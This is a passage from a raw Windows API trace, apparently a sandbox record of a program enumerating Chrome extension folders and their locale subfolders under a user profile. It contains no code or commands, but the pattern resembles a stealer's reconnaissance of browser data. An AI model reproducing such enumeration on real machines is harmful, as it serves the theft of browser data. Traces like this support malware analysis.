lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.794] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.794] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.794] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.795] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.795] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.796] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.797] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.797] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.797] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.797] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.797] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.798] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.798] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.799] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.799] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.799] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.799] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.800] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.800] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.800] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.801] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.801] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.801] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.802] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.802] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.803] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.803] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.803] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.803] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0143.804] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0143.804] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0143.804] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0143.805] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0143.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32d68 [0143.806] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0143.806] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0143.806] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0143.806] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0143.806] FindClose (in: hFindFile=0xa32ce8 | out: hFindFile=0xa32ce8) returned 1 [0143.806] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0143.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32ce8 [0143.808] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\*", lpFindFileData=0x2b4dd4c | out: lpFindFileData=0x2b4dd4c) returned 0xa32968 [0144.036] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa327e8 [0144.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0144.927] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0144.927] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0144.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0144.997] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0144.997] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0144.997] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0144.997] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0144.999] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0144.999] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.041] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.042] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.042] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.042] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.043] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.043] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.043] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.044] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.044] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.045] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.045] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.045] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.045] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.045] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.046] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.046] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.046] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.046] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.047] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.048] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.048] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.048] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.057] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.057] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.057] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.057] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.058] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.058] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.058] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.058] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.059] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.059] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.059] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.060] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.060] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.060] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.061] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.061] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.061] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.061] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.062] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.062] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.063] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.063] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.063] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.063] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.064] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.064] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.064] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.064] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.065] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.065] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.065] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.065] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.066] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.066] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.066] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.066] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.067] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.114] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.115] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.115] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.115] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.115] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.115] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0145.197] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0145.198] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0145.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 